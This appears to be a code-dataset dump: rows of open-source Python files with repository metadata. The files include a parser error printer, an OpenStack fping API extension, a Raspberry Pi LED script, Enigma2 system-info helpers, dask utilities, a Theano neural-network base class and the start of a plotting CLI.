repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
sssstest/GameEditor
|
dejavu/driver.py
|
1
|
1128
|
#!/usr/bin/env python
from __future__ import print_function
class build_log():
def append(self, c):
print(c,end="")
def message(self, c):
print(c)
def percent(self, i):
print(i)
class error_printer():#error_stream
def __init__(self, log):
self.log=log
self.errors = 0
self.context = "<untitled>"
def set_context(self, c):
self.context = c
def count(self):
return self.errors
def error(self, e):
s = self.context + ":" + str(e.unexpected.row) + ":" + str(e.unexpected.col) + ": " + "error: unexpected '" +str(e.unexpected) + "'; expected "
if e.expected:
s += e.expected
else:
s += e.expected_token
s += "\n"
self.log.append(s)
self.log.append(self.parser.lexer.source.split("\n")[e.unexpected.row-1]+"\n")
self.log.append(" "*(e.unexpected.col-1)+"^\n")
self.errors+=1
raise 1
def error_string(self, e):
self.log.append(e)
self.errors+=1
def progress(i, n = ""):
self.log.percent(i)
if not n.empty():
self.log.message(n)
def compile(self, target, source, log):
errors = error_printer(log)
return linker(source, getHostTriple(), errors).build(target)
|
gpl-3.0
| -8,586,504,180,212,668,000
| 20.283019
| 145
| 0.631206
| false
| 2.666667
| false
| false
| false
|
HybridF5/jacket
|
jacket/api/compute/openstack/compute/fping.py
|
1
|
4989
|
# Copyright 2011 Grid Dynamics
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
import os
from oslo_config import cfg
import six
from webob import exc
from jacket.api.compute.openstack import common
from jacket.api.compute.openstack import extensions
from jacket.api.compute.openstack import wsgi
from jacket.compute import cloud
from jacket.i18n import _
from jacket.compute import utils
ALIAS = "os-fping"
authorize = extensions.os_compute_authorizer(ALIAS)
CONF = cfg.CONF
CONF.import_opt('fping_path', 'jacket.api.compute.openstack.compute.legacy_v2.contrib.'
'fping')
class FpingController(wsgi.Controller):
def __init__(self, network_api=None):
self.compute_api = cloud.API(skip_policy_check=True)
self.last_call = {}
def check_fping(self):
if not os.access(CONF.fping_path, os.X_OK):
raise exc.HTTPServiceUnavailable(
explanation=_("fping utility is not found."))
@staticmethod
def fping(ips):
fping_ret = utils.execute(CONF.fping_path, *ips,
check_exit_code=False)
if not fping_ret:
return set()
alive_ips = set()
for line in fping_ret[0].split("\n"):
ip = line.split(" ", 1)[0]
if "alive" in line:
alive_ips.add(ip)
return alive_ips
@staticmethod
def _get_instance_ips(context, instance):
ret = []
for network in common.get_networks_for_instance(
context, instance).values():
all_ips = itertools.chain(network["ips"], network["floating_ips"])
ret += [ip["address"] for ip in all_ips]
return ret
@extensions.expected_errors(503)
def index(self, req):
context = req.environ["compute.context"]
search_opts = dict(deleted=False)
if "all_tenants" in req.GET:
authorize(context, action='all_tenants')
else:
authorize(context)
if context.project_id:
search_opts["project_id"] = context.project_id
else:
search_opts["user_id"] = context.user_id
self.check_fping()
include = req.GET.get("include", None)
if include:
include = set(include.split(","))
exclude = set()
else:
include = None
exclude = req.GET.get("exclude", None)
if exclude:
exclude = set(exclude.split(","))
else:
exclude = set()
instance_list = self.compute_api.get_all(
context, search_opts=search_opts, want_objects=True)
ip_list = []
instance_ips = {}
instance_projects = {}
for instance in instance_list:
uuid = instance.uuid
if uuid in exclude or (include is not None and
uuid not in include):
continue
ips = [str(ip) for ip in self._get_instance_ips(context, instance)]
instance_ips[uuid] = ips
instance_projects[uuid] = instance.project_id
ip_list += ips
alive_ips = self.fping(ip_list)
res = []
for instance_uuid, ips in six.iteritems(instance_ips):
res.append({
"id": instance_uuid,
"project_id": instance_projects[instance_uuid],
"alive": bool(set(ips) & alive_ips),
})
return {"servers": res}
@extensions.expected_errors((404, 503))
def show(self, req, id):
context = req.environ["compute.context"]
authorize(context)
self.check_fping()
instance = common.get_instance(self.compute_api, context, id)
ips = [str(ip) for ip in self._get_instance_ips(context, instance)]
alive_ips = self.fping(ips)
return {
"server": {
"id": instance.uuid,
"project_id": instance.project_id,
"alive": bool(set(ips) & alive_ips),
}
}
class Fping(extensions.V21APIExtensionBase):
"""Fping Management Extension."""
name = "Fping"
alias = ALIAS
version = 1
def get_resources(self):
res = extensions.ResourceExtension(ALIAS, FpingController())
return [res]
def get_controller_extensions(self):
return []
|
apache-2.0
| -2,104,035,560,630,013,200
| 31.607843
| 87
| 0.585288
| false
| 4.020145
| false
| false
| false
|
mueckl/raspberry_nagios_alert
|
scripts/red.led.py
|
1
|
1090
|
import RPi.GPIO as GPIO
import os.path
from time import sleep
import sys
# use P1 header pin numbering convention
#GPIO.setmode(GPIO.BOARD)
GPIO.setmode(GPIO.BCM)
pin=23
# Set up the GPIO channels - one input and one output
#GPIO.setup(11, GPIO.IN)
GPIO.setup(pin, GPIO.OUT)
# Input from pin 11
#input_value = GPIO.input(11)
# Output to pin 12
GPIO.output(pin, GPIO.LOW)
# The same script as above but using BCM GPIO 00..nn numbers
#GPIO.setmode(GPIO.BCM)
# Set up the GPIO channels - one input and one output
#GPIO.setup(17, GPIO.IN)
#GPIO.setup(18, GPIO.OUT)
# Input from pin 11
#input_value = GPIO.input(17)
# Output to pin 12
#GPIO.output(18, GPIO.HIGH)
fname="/dev/shm/red.led"
onoff=0
while (1>0):
if os.path.isfile(fname):
with open(fname) as f:
content = f.readlines()
for number in content:
onoff=(onoff+1)%2;
if (onoff==1):
GPIO.output(pin, GPIO.HIGH)
else:
GPIO.output(pin, GPIO.LOW)
sleep(float(number))
GPIO.output(pin, GPIO.LOW)
else:
sleep(0.5)
|
mit
| -1,505,786,839,147,413,000
| 19.185185
| 60
| 0.640367
| false
| 2.945946
| false
| false
| false
|
oostende/openblachole
|
lib/python/Components/About.py
|
2
|
4196
|
from boxbranding import getImageVersion, getMachineBuild
from sys import modules
import socket, fcntl, struct
def getVersionString():
return getImageVersion()
def getFlashDateString():
try:
f = open("/etc/install","r")
flashdate = f.read()
f.close()
return flashdate
except:
return _("unknown")
def getEnigmaVersionString():
return getImageVersion()
def getGStreamerVersionString():
import enigma
return enigma.getGStreamerVersionString()
def getKernelVersionString():
try:
f = open("/proc/version","r")
kernelversion = f.read().split(' ', 4)[2].split('-',2)[0]
f.close()
return kernelversion
except:
return _("unknown")
def getChipSetString():
try:
f = open('/proc/stb/info/chipset', 'r')
chipset = f.read()
f.close()
return str(chipset.lower().replace('\n','').replace('bcm','').replace('brcm',''))
except IOError:
return _("unavailable")
def getCPUSpeedString():
cpu_speed = 0
try:
file = open('/proc/cpuinfo', 'r')
lines = file.readlines()
file.close()
for x in lines:
splitted = x.split(': ')
if len(splitted) > 1:
splitted[1] = splitted[1].replace('\n','')
if splitted[0].startswith("cpu MHz"):
cpu_speed = float(splitted[1].split(' ')[0])
break
except IOError:
print "[About] getCPUSpeedString, /proc/cpuinfo not available"
if cpu_speed == 0:
if getMachineBuild() in ('hd51','hd52'):
import binascii
f = open('/sys/firmware/devicetree/base/cpus/cpu@0/clock-frequency', 'rb')
clockfrequency = f.read()
f.close()
cpu_speed = round(int(binascii.hexlify(clockfrequency), 16)/1000000,1)
else:
try: # Solo4K
file = open('/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq', 'r')
cpu_speed = float(file.read()) / 1000
file.close()
except IOError:
print "[About] getCPUSpeedString, /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq not available"
if cpu_speed > 0:
if cpu_speed >= 1000:
cpu_speed = "%s GHz" % str(round(cpu_speed/1000,1))
else:
cpu_speed = "%s MHz" % str(round(cpu_speed,1))
return cpu_speed
return _("unavailable")
def getCPUString():
system = _("unavailable")
try:
file = open('/proc/cpuinfo', 'r')
lines = file.readlines()
for x in lines:
splitted = x.split(': ')
if len(splitted) > 1:
splitted[1] = splitted[1].replace('\n','')
if splitted[0].startswith("system type"):
system = splitted[1].split(' ')[0]
elif splitted[0].startswith("model name"):
system = splitted[1].split(' ')[0]
file.close()
return system
except IOError:
return _("unavailable")
def getCpuCoresString():
try:
file = open('/proc/cpuinfo', 'r')
lines = file.readlines()
for x in lines:
splitted = x.split(': ')
if len(splitted) > 1:
splitted[1] = splitted[1].replace('\n','')
if splitted[0].startswith("processor"):
if int(splitted[1]) > 0:
cores = 2
else:
cores = 1
file.close()
return cores
except IOError:
return _("unavailable")
def _ifinfo(sock, addr, ifname):
iface = struct.pack('256s', ifname[:15])
info = fcntl.ioctl(sock.fileno(), addr, iface)
if addr == 0x8927:
return ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1].upper()
else:
return socket.inet_ntoa(info[20:24])
def getIfConfig(ifname):
ifreq = {'ifname': ifname}
infos = {}
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# offsets defined in /usr/include/linux/sockios.h on linux 2.6
infos['addr'] = 0x8915 # SIOCGIFADDR
infos['brdaddr'] = 0x8919 # SIOCGIFBRDADDR
infos['hwaddr'] = 0x8927 # SIOCSIFHWADDR
infos['netmask'] = 0x891b # SIOCGIFNETMASK
try:
for k,v in infos.items():
ifreq[k] = _ifinfo(sock, v, ifname)
except:
pass
sock.close()
return ifreq
def getIfTransferredData(ifname):
f = open('/proc/net/dev', 'r')
for line in f:
if ifname in line:
data = line.split('%s:' % ifname)[1].split()
rx_bytes, tx_bytes = (data[0], data[8])
f.close()
return rx_bytes, tx_bytes
def getPythonVersionString():
try:
import commands
status, output = commands.getstatusoutput("python -V")
return output.split(' ')[1]
except:
return _("unknown")
# For modules that do "from About import about"
about = modules[__name__]
|
gpl-2.0
| 9,068,916,219,085,860,000
| 25.225
| 106
| 0.651096
| false
| 2.8294
| false
| false
| false
|
PhE/dask
|
dask/utils.py
|
1
|
8629
|
from __future__ import absolute_import, division, print_function
from collections import Iterator
from contextlib import contextmanager
from errno import ENOENT
from functools import partial
import os
import sys
import shutil
import struct
import gzip
import tempfile
import inspect
from .compatibility import unicode, long
def raises(err, lamda):
try:
lamda()
return False
except err:
return True
def deepmap(func, *seqs):
""" Apply function inside nested lists
>>> inc = lambda x: x + 1
>>> deepmap(inc, [[1, 2], [3, 4]])
[[2, 3], [4, 5]]
>>> add = lambda x, y: x + y
>>> deepmap(add, [[1, 2], [3, 4]], [[10, 20], [30, 40]])
[[11, 22], [33, 44]]
"""
if isinstance(seqs[0], (list, Iterator)):
return [deepmap(func, *items) for items in zip(*seqs)]
else:
return func(*seqs)
@contextmanager
def ignoring(*exceptions):
try:
yield
except exceptions:
pass
@contextmanager
def tmpfile(extension='', dir=None):
extension = '.' + extension.lstrip('.')
handle, filename = tempfile.mkstemp(extension, dir=dir)
os.close(handle)
os.remove(filename)
try:
yield filename
finally:
if os.path.exists(filename):
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
os.remove(filename)
@contextmanager
def filetext(text, extension='', open=open, mode='w'):
with tmpfile(extension=extension) as filename:
f = open(filename, mode=mode)
try:
f.write(text)
finally:
try:
f.close()
except AttributeError:
pass
yield filename
def repr_long_list(seq):
"""
>>> repr_long_list(list(range(100)))
'[0, 1, 2, ..., 98, 99]'
"""
if len(seq) < 8:
return repr(seq)
else:
return repr(seq[:3])[:-1] + ', ..., ' + repr(seq[-2:])[1:]
class IndexCallable(object):
""" Provide getitem syntax for functions
>>> def inc(x):
... return x + 1
>>> I = IndexCallable(inc)
>>> I[3]
4
"""
__slots__ = 'fn',
def __init__(self, fn):
self.fn = fn
def __getitem__(self, key):
return self.fn(key)
@contextmanager
def filetexts(d, open=open):
""" Dumps a number of textfiles to disk
d - dict
a mapping from filename to text like {'a.csv': '1,1\n2,2'}
"""
for filename, text in d.items():
f = open(filename, 'wt')
try:
f.write(text)
finally:
try:
f.close()
except AttributeError:
pass
yield list(d)
for filename in d:
if os.path.exists(filename):
os.remove(filename)
opens = {'gzip': gzip.open}
def textblock(file, start, stop, compression=None):
""" Pull out a block of text from a file given start and stop bytes
This gets data starting/ending from the next newline delimiter
Example
-------
>> with open('myfile.txt', 'w') as f:
.. f.write('123\n456\n789\nabc')
>> f = open('myfile.txt')
In the example below, 1 and 10 don't line up with endlines
>> textblock(f, 1, 10)
'456\n789\n'
"""
if isinstance(file, (str, unicode)):
myopen = opens.get(compression, open)
f = myopen(file, 'rb')
try:
result = textblock(f, start, stop)
finally:
f.close()
return result
if start:
file.seek(start - 1)
line = file.readline() # burn a line
start = file.tell()
if stop is None:
file.seek(start)
return file.read()
stop -= 1
file.seek(stop)
line = file.readline()
stop = file.tell()
file.seek(start)
return file.read(stop - start)
def concrete(seq):
""" Make nested iterators concrete lists
>>> data = [[1, 2], [3, 4]]
>>> seq = iter(map(iter, data))
>>> concrete(seq)
[[1, 2], [3, 4]]
"""
if isinstance(seq, Iterator):
seq = list(seq)
if isinstance(seq, (tuple, list)):
seq = list(map(concrete, seq))
return seq
def skip(func):
pass
def pseudorandom(n, p, key):
""" Pseudorandom array of integer indexes
>>> pseudorandom(5, [0.5, 0.5], key=123)
array([1, 0, 0, 1, 1], dtype=int8)
>>> pseudorandom(10, [0.5, 0.2, 0.2, 0.1], key=5)
array([0, 2, 0, 3, 0, 1, 2, 1, 0, 0], dtype=int8)
"""
import numpy as np
p = list(p)
cp = np.cumsum([0] + p)
assert np.allclose(1, cp[-1])
assert len(p) < 256
x = np.random.RandomState(key).random_sample(n)
out = np.empty(n, dtype='i1')
for i, (low, high) in enumerate(zip(cp[:-1], cp[1:])):
out[(x >= low) & (x < high)] = i
return out
def getargspec(func):
"""Version of inspect.getargspec that works for functools.partial objects"""
if isinstance(func, partial):
return inspect.getargspec(func.func)
else:
if isinstance(func, type):
return inspect.getargspec(func.__init__)
else:
return inspect.getargspec(func)
def is_integer(i):
"""
>>> is_integer(6)
True
>>> is_integer(42.0)
True
>>> is_integer('abc')
False
"""
import numpy as np
if isinstance(i, (int, long)):
return True
if isinstance(i, float):
return (i).is_integer()
if issubclass(type(i), np.integer):
return i
else:
return False
def file_size(fn, compression=None):
""" Size of a file on disk
If compressed then return the uncompressed file size
"""
if compression == 'gzip':
with open(fn, 'rb') as f:
f.seek(-4, 2)
result = struct.unpack('I', f.read(4))[0]
else:
result = os.stat(fn).st_size
return result
ONE_ARITY_BUILTINS = set([abs, all, any, bool, bytearray, bytes, callable, chr,
classmethod, complex, dict, dir, enumerate, eval, float, format, frozenset,
hash, hex, id, int, iter, len, list, max, min, next, oct, open, ord, range,
repr, reversed, round, set, slice, sorted, staticmethod, str, sum, tuple,
type, vars, zip])
if sys.version_info[0] == 3: # Python 3
ONE_ARITY_BUILTINS |= set([ascii])
if sys.version_info[:2] != (2, 6):
ONE_ARITY_BUILTINS |= set([memoryview])
MULTI_ARITY_BUILTINS = set([compile, delattr, divmod, filter, getattr, hasattr,
isinstance, issubclass, map, pow, setattr])
def takes_multiple_arguments(func):
""" Does this function take multiple arguments?
>>> def f(x, y): pass
>>> takes_multiple_arguments(f)
True
>>> def f(x): pass
>>> takes_multiple_arguments(f)
False
>>> def f(x, y=None): pass
>>> takes_multiple_arguments(f)
False
>>> def f(*args): pass
>>> takes_multiple_arguments(f)
True
>>> class Thing(object):
... def __init__(self, a): pass
>>> takes_multiple_arguments(Thing)
False
"""
if func in ONE_ARITY_BUILTINS:
return False
elif func in MULTI_ARITY_BUILTINS:
return True
try:
spec = getargspec(func)
except:
return False
try:
is_constructor = spec.args[0] == 'self' and isinstance(func, type)
except:
is_constructor = False
if spec.varargs:
return True
if spec.defaults is None:
return len(spec.args) - is_constructor != 1
return len(spec.args) - len(spec.defaults) - is_constructor > 1
class Dispatch(object):
"""Simple single dispatch."""
def __init__(self):
self._lookup = {}
def register(self, type, func):
"""Register dispatch of `func` on arguments of type `type`"""
if isinstance(type, tuple):
for t in type:
self.register(t, func)
else:
self._lookup[type] = func
def __call__(self, arg):
# We dispatch first on type(arg), and fall back to iterating through
# the mro. This is significantly faster in the common case where
# type(arg) is in the lookup, with only a small penalty on fall back.
lk = self._lookup
typ = type(arg)
if typ in lk:
return lk[typ](arg)
for cls in inspect.getmro(typ)[1:]:
if cls in lk:
return lk[cls](arg)
raise TypeError("No dispatch for {0} type".format(typ))
def ensure_not_exists(filename):
"""
Ensure that a file does not exist.
"""
try:
os.unlink(filename)
except OSError as e:
if e.errno != ENOENT:
raise
|
bsd-3-clause
| -3,181,018,165,780,446,000
| 22.576503
| 80
| 0.560436
| false
| 3.586451
| false
| false
| false
|
moberweger/deep-prior
|
src/net/netbase.py
|
1
|
17161
|
"""Provides NetBase class for generating networks from configurations.
NetBase provides interface for building CNNs.
It should be inherited by all network classes in order to provide
basic functionality, ie computing outputs, creating computational
graph, managing dropout, etc.
NetBaseParams is the parametrization of these NetBase networks.
Copyright 2015 Markus Oberweger, ICG,
Graz University of Technology <oberweger@icg.tugraz.at>
This file is part of DeepPrior.
DeepPrior is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
DeepPrior is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with DeepPrior. If not, see <http://www.gnu.org/licenses/>.
"""
import difflib
import gzip
import time
import numpy
import cPickle
import re
import theano
import theano.tensor as T
from net.convpoollayer import ConvPoolLayer, ConvPoolLayerParams
from net.convlayer import ConvLayer, ConvLayerParams
from net.hiddenlayer import HiddenLayer, HiddenLayerParams
from net.poollayer import PoolLayer, PoolLayerParams
from net.dropoutlayer import DropoutLayer, DropoutLayerParams
__author__ = "Markus Oberweger <oberweger@icg.tugraz.at>"
__copyright__ = "Copyright 2015, ICG, Graz University of Technology, Austria"
__credits__ = ["Paul Wohlhart", "Markus Oberweger"]
__license__ = "GPL"
__version__ = "1.0"
__maintainer__ = "Markus Oberweger"
__email__ = "oberweger@icg.tugraz.at"
__status__ = "Development"
class NetBaseParams(object):
def __init__(self):
"""
Init the parametrization
"""
self.numInputs = 1
self.numOutputs = 1
self.layers = []
self.inputDim = None
self.outputDim = None
def getMemoryRequirement(self):
"""
Get memory requirements of weights
:return: memory requirement
"""
mem = 0
for l in self.layers:
mem += l.getMemoryRequirement()
return mem
class NetBase(object):
def __init__(self, rng, inputVar, cfgParams, twin=None):
"""
Initialize object by constructing the layers
:param rng: random number generator
:param inputVar: input variable
:param cfgParams: parameters
:param twin: determine to copy layer @deprecated
:return: None
"""
self._params_filter = []
self._weights_filter = []
self.inputVar = inputVar
self.cfgParams = cfgParams
self.rng = rng
# create network
self.layers = []
i = 0
for layerParam in cfgParams.layers:
# first input is inputVar, otherwise input is output of last one
if i == 0:
inp = inputVar
else:
# flatten output from conv to hidden layer and reshape from hidden to conv layer
if (len(self.layers[-1].cfgParams.outputDim) == 4) and (len(layerParam.inputDim) == 2):
inp = self.layers[-1].output.flatten(2)
inp.name = "input_layer_{}".format(i) # name this node as it is different from previous output
elif (len(layerParam.inputDim) == 4) and (len(self.layers[-1].cfgParams.outputDim) == 2):
inp = T.reshape(self.layers[-1].output, layerParam.inputDim, ndim=4)
inp.name = "input_layer_{}".format(i) # name this node as it is different from previous output
else:
inp = self.layers[-1].output
id = layerParam.__class__.__name__[:-6]
constructor = globals()[id]
self.layers.append(constructor(rng,
inputVar=inp,
cfgParams=layerParam,
copyLayer=None if (twin is None) else twin.layers[i],
layerNum=i))
i += 1
# assemble externally visible parameters
self.output = self.layers[-1].output
# TODO test
# Ngyuen Widrow initialization
# for l in range(len(self.layers)):
# if isinstance(self.layers[l], HiddenLayer) or isinstance(self.layers[l], HiddenLayerInv):
# if l > 0:
# self.resetWeightsNW(rng, self.layers[l-1].cfgParams.getOutputRange(), self.layers[l], self.layers[l].cfgParams.getOutputRange())
# else:
# self.resetWeightsNW(rng, [-1, 1], self.layers[l], self.layers[l].cfgParams.getOutputRange())
def __str__(self):
"""
prints the parameters of the layers of the network
:return: configuration string
"""
cfg = "Network configuration:\n"
i = 0
for l in self.layers:
cfg += "Layer {}: {} with {} \n".format(i, l.__class__.__name__, l)
i += 1
return cfg
@property
def params(self):
"""
Get a list of the learnable theano parameters for this network.
:return: list of theano variables
"""
# remove filtered params
if not hasattr(self, '_params_filter'):
self._params_filter = []
prms = [p for l in self.layers for p in l.params if p.name not in self._params_filter]
# only unique variables, remove shared weights from list
return dict((obj.auto_name, obj) for obj in prms).values()
@property
def params_filter(self):
return self._params_filter
@params_filter.setter
def params_filter(self, bl):
names = [p.name for l in self.layers for p in l.params]
for b in bl:
if b not in names:
raise UserWarning("Param {} not in model!".format(b))
self._params_filter = bl
@property
def weights(self):
"""
Get a list of the weights for this network.
:return: list of theano variables
"""
# remove filtered weights
if not hasattr(self, '_weights_filter'):
self._weights_filter = []
prms = [p for l in self.layers for p in l.weights if p.name not in self._weights_filter]
# only unique variables, remove shared weights from list
return dict((obj.auto_name, obj) for obj in prms).values()
@property
def weights_filter(self):
return self._weights_filter
@weights_filter.setter
def weights_filter(self, bl):
names = [p.name for l in self.layers for p in l.weights]
for b in bl:
if b not in names:
raise UserWarning("Weight {} not in model!".format(b))
self._weights_filter = bl
def computeOutput(self, inputs, timeit=False):
"""
compute the output of the network for given input
:param inputs: input data
:param timeit: print the timing information
:return: output of the network
"""
# Convert input data
if not isinstance(inputs, list):
inputs = [inputs]
# All data must be same
assert all(i.shape[0] == inputs[0].shape[0] for i in inputs[1:])
if self.dropoutEnabled():
print("WARNING: dropout is enabled in at least one layer for testing, DISABLING")
self.disableDropout()
floatX = theano.config.floatX # @UndefinedVariable
batch_size = self.cfgParams.batch_size
nSamp = inputs[0].shape[0]
padSize = int(batch_size * numpy.ceil(nSamp / float(batch_size)))
out = []
if isinstance(self.output, list):
for i in range(len(self.output)):
outSize = list(self.cfgParams.outputDim[i])
outSize[0] = padSize
out.append(numpy.zeros(tuple(outSize), dtype=floatX))
else:
outSize = list(self.cfgParams.outputDim)
outSize[0] = padSize
out.append(numpy.zeros(tuple(outSize), dtype=floatX))
index = T.lscalar('index')
if not hasattr(self, 'compute_output'):
self.input_data = []
self.input_givens = dict()
input_pad = []
if inputs[0].shape[0] < batch_size:
for k in range(len(inputs)):
shape = list(inputs[k].shape)
shape[0] = batch_size
input_pad.append(numpy.zeros(tuple(shape), dtype=floatX))
input_pad[k][0:inputs[k].shape[0]] = inputs[k][0:inputs[k].shape[0]]
input_pad[k][inputs[k].shape[0]:] = inputs[k][-1]
else:
for k in range(len(inputs)):
input_pad.append(inputs[k])
for i in range(len(inputs)):
if len(inputs) == 1 and not isinstance(self.inputVar, list):
self.input_data.append(theano.shared(input_pad[i][0:batch_size], self.inputVar.name, borrow=True))
self.input_givens[self.inputVar] = self.input_data[i][index * batch_size:(index + 1) * batch_size]
else:
assert isinstance(self.inputVar, list)
self.input_data.append(theano.shared(input_pad[i][0:batch_size], self.inputVar[i].name, borrow=True))
self.input_givens[self.inputVar[i]] = self.input_data[i][index * batch_size:(index + 1) * batch_size]
print("compiling compute_output() ...")
self.compute_output = theano.function(inputs=[index], outputs=self.output, givens=self.input_givens,
mode='FAST_RUN', on_unused_input='warn')
print("done")
# iterate to save memory
n_test_batches = padSize / batch_size
start = time.time()
for i in range(n_test_batches):
# pad last batch to batch size
if i == n_test_batches-1:
input_pad = []
for k in range(len(inputs)):
shape = list(inputs[k].shape)
shape[0] = batch_size
input_pad.append(numpy.zeros(tuple(shape), dtype=floatX))
input_pad[k][0:inputs[k].shape[0]-i*batch_size] = inputs[k][i*batch_size:]
input_pad[k][inputs[k].shape[0]-i*batch_size:] = inputs[k][-1]
for k in range(len(inputs)):
self.input_data[k].set_value(input_pad[k], borrow=True)
else:
for k in range(len(inputs)):
self.input_data[k].set_value(inputs[k][i * batch_size:(i + 1) * batch_size], borrow=True)
o = self.compute_output(0)
if isinstance(self.output, list):
for k in range(len(self.output)):
out[k][i * batch_size:(i + 1) * batch_size] = o[k]
else:
out[0][i * batch_size:(i + 1) * batch_size] = o.reshape(self.cfgParams.outputDim)
end = time.time()
if timeit:
print("{} in {}s, {}ms per frame".format(padSize, end - start, (end - start)*1000./padSize))
if isinstance(self.output, list):
for k in range(len(self.output)):
out[k] = out[k][0:nSamp]
return out
else:
return out[0][0:nSamp]
def enableDropout(self):
"""
Enables dropout in all dropout layers, ie for training
:return: None
"""
for layer in self.layers:
if isinstance(layer, DropoutLayer):
layer.enableDropout()
def disableDropout(self):
"""
Disables dropout in all dropout layers, ie for classification
:return: None
"""
for layer in self.layers:
if isinstance(layer, DropoutLayer):
layer.disableDropout()
def dropoutEnabled(self):
"""
Disables dropout in all dropout layers, ie for classification
:return: None
"""
for layer in self.layers:
if isinstance(layer, DropoutLayer):
if layer.dropoutEnabled():
return True
return False
def hasDropout(self):
"""
Checks if network has dropout layers
:return: True if there are dropout layers
"""
for layer in self.layers:
if isinstance(layer, DropoutLayer):
return True
return False
@property
def weightVals(self):
"""
Returns list of the weight values
:return: list of weight values
"""
return self.recGetWeightVals(self.params)
@weightVals.setter
def weightVals(self, value):
"""
Set weights with given values
:param value: values for weights
:return: None
"""
self.recSetWeightVals(self.params, value)
def recSetWeightVals(self, param, value):
"""
Set weights with given values
:param param: layer parameters listing the layers weights
:param value: values for weights
:return: None
"""
if isinstance(value, list):
assert isinstance(param, list), "tried to assign a list of weights to params, which is not a list {}".format(type(param))
assert len(param) == len(value), "tried to assign unequal list of weights {} != {}".format(len(param), len(value))
for i in xrange(len(value)):
self.recSetWeightVals(param[i], value[i])
else:
param.set_value(value)
def recGetWeightVals(self, param):
"""
Returns list of the weight values
:param param: layer parameters listing the layers weights
:return: list of weight values
"""
w = []
if isinstance(param, list):
for p in param:
w.append(self.recGetWeightVals(p))
else:
w = param.get_value()
return w
def save(self, filename):
"""
Save the state of this network to a pickle file on disk.
:param filename: Save the parameters of this network to a pickle file at the named path. If this name ends in
".gz" then the output will automatically be gzipped; otherwise the output will be a "raw" pickle.
:return: None
"""
state = dict([('class', self.__class__.__name__), ('network', self.__str__())])
for layer in self.layers:
key = '{}-values'.format(layer.layerNum)
state[key] = [p.get_value() for p in layer.params]
opener = gzip.open if filename.lower().endswith('.gz') else open
handle = opener(filename, 'wb')
cPickle.dump(state, handle, -1)
handle.close()
print 'Saved model parameter to {}'.format(filename)
def load(self, filename):
"""
Load the parameters for this network from disk.
:param filename: Load the parameters of this network from a pickle file at the named path. If this name ends in
".gz" then the input will automatically be gunzipped; otherwise the input will be treated as a "raw" pickle.
:return: None
"""
opener = gzip.open if filename.lower().endswith('.gz') else open
handle = opener(filename, 'rb')
saved = cPickle.load(handle)
handle.close()
if saved['network'] != self.__str__():
print "Possibly not matching network configuration!"
differences = list(difflib.Differ().compare(saved['network'].splitlines(), self.__str__().splitlines()))
print "Differences are:"
print "\n".join(differences)
for layer in self.layers:
if len(layer.params) != len(saved['{}-values'.format(layer.layerNum)]):
print "Warning: Layer parameters for layer {} do not match. Trying to fit on shape!".format(layer.layerNum)
n_assigned = 0
for p in layer.params:
for v in saved['{}-values'.format(layer.layerNum)]:
if p.get_value().shape == v.shape:
p.set_value(v)
n_assigned += 1
if n_assigned != len(layer.params):
raise ImportError("Could not load all necessary variables!")
else:
print "Found fitting parameters!"
else:
prms = layer.params
for p, v in zip(prms, saved['{}-values'.format(layer.layerNum)]):
if p.get_value().shape == v.shape:
p.set_value(v)
else:
print "WARNING: Skipping parameter for {}! Shape {} does not fit {}.".format(p.name, p.get_value().shape, v.shape)
print 'Loaded model parameters from {}'.format(filename)
|
gpl-3.0
| -8,016,346,717,327,464,000
| 37.740406
| 150
| 0.569489
| false
| 4.16226
| false
| false
| false
|
per9000/naiveplot
|
src/nplot.py
|
1
|
5073
|
#!/usr/bin/python
from argparse import ArgumentParser
from sys import stdin
from string import ascii_uppercase
from naiveplot import NaivePlot, Curve, Point, Line
class NaiveParserPlotter:
"""Class for reading and plotting"""
def __init__(self):
"""Setup place holders"""
self.args = None
self.points = None
self.lines = None
self.colors = None
self.plot = None
return
def setup(self):
"""Do all setup after parsing args"""
self.get_handle()
self.setup_formats()
return
def get_handle(self):
"""Get a handle to read from"""
if self.args.std_in:
self.handle = stdin
elif self.args.in_file:
self.handle = open(self.args.in_file, 'r')
else:
pass # TODO: exception?
return
def setup_formats(self):
"""Return format vectors"""
self.points = list(ascii_uppercase)
self.lines = ['.', '-', ':', '~', "'"]
self.colors = ['blue', 'red', 'green', 'yellow', 'magenta', 'cyan',
'grey'] #'white'
return
def get_format(self, idx):
"""get approproate combo"""
attrs = list()
for container in [self.points, self.lines, self.colors]:
attrs.append(container[idx%len(container)])
return tuple(attrs)
def parse_args(self, args=None):
"""Parse the arguments"""
parser = ArgumentParser(description="Plot the numbers given in a file "
"or in stdin")
rgroup = parser.add_argument_group("Read from...")
rgroup.add_argument('--std-in', action="store_true", default=False,
help="Perform doc tests and exit instead.")
rgroup.add_argument('--in-file', '-f', type=str, default=None,
help="Specify input file path.")
dgroup = parser.add_argument_group("Input data...")
dgroup.add_argument('--xy', '-x', action="store_true", default=False,
help="Treat first column as x values, and the "
"following as y-values (default False).")
